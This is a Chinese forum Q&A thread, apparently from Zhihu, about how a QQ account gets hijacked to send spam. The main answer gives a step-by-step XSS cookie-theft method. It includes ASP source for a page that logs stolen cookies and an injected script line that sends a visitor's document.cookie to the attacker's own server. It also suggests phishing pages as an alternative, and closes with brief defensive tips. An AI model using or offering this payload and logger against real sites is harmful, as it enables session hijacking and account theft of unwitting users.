被人盜用自己的QQ發消息是CSRF漏洞導致的嗎?

最近的QQ被人盜發了垃圾說說(傳銷廣告),網上查了查,才知道是CSRF漏洞、XSS的鍋(沒有專業知識,也沒有深入弄懂,只知道自己的密碼應該還是安全的)。
我想問問,如果QQ被人盜用直接給好友發詐騙信息,還有可能是CSRF漏洞導致的嗎?換句話說,在這樣的情況下,自己的賬戶密碼還安全嗎?


先謝邀~

你看,題主又貪小便宜了吧。話說滲透這東西就是三分靠技術七分靠手段。人總會因為心理因素搞出點事情來。當然,QQ每天被XSS的多了去了。那我就簡單提一下,妄大家以後也多多防範!

先說說XSS,概念不累贅,搬百科沒意義,大家自己可以去研究下。姑且只提重點。一般搞XSS都是折騰cookie,拿到憑證用個工具啊瀏覽器啊比如fox替換下cookie登錄,這個對於web管理員來說相當嚴重,進了後台可以改密碼啊,建用戶提權啊啥的。當然首先網站得有XSS漏洞啊~不然搞毛線。

對於QQ來說,那就扯淡了,如此大的互聯網巨頭,網安方面趨於完善。但天網恢恢疏而不漏,網站越大,越複雜,有時候一些小細節就可能造成危害。比如說前些年TXQQ管家的舉報中心,由於對URL過濾存在的不足,導致可以提交XSS,這個咱不細細研究,這裡畢竟就說說XSS原理,有興趣大家可以多關注網安。

乾貨:

1.搭建個web網站

2.寫個獲取cookie的asp頁面

3.找到存在注入的網站

4.構造XSS代碼上傳

加點福利,扔個獲取cookie的asp源碼吧。

&
&LIUSE網路安全&
&
&<%WebTestFile = Server.MapPath("cookie.txt") msg = Request("msg") set LS = server.CreateObject("scripting.filesystemobject") set OFile = LS.OpenTextFile(WebTestFile,8,True,0) OFile.WriteLine(""msg"") OFile.close() set LS = nothing%&>
&

&

寫完後仍自己的WEB伺服器上,然後去找其它XSS網站。

找到存在XSS的網站後(最好是存儲型XSS),找個能上傳的地方,比如說評論啊,發表啊啥的。

然後插入XSS語句(這裡當然是連接到我們搭建的web網站的了!)比如:

&window.open("你的網址/cookie.asp?msg="+document.cookie)&

OK,誰點誰中招。

不過話又說回來,那我為啥要點呢?我不點行不行?行!當然行啊!那我好奇的是題主為啥要點?QQ新年送50元話費?王者榮耀抽獎?哈哈哈。再不行我折騰個釣魚頁面好了,cookie都不需要了,直接用戶名密碼釣上來,你看咋樣?(題主說的登錄別人QQ號發詐騙信息,我估計是釣走了吧!)

有時候有空的時候樓主也推送點小教程(針對入門的小白)希望大家提高安全意識!(算是小廣告吧,不喜歡我就撕了去)

http://weixin.qq.com/r/BjiSiirEh3f4rW7p920U (二維碼自動識別)


設置二步驗證,不常用設備驗證登錄。
安裝QQ安全中心,異地登錄提醒。
定時清理cookies


推薦閱讀:

網路安全技術和網路安全意識哪個更重要?

TAG:騰訊QQ | 網路安全 | 信息網路安全 |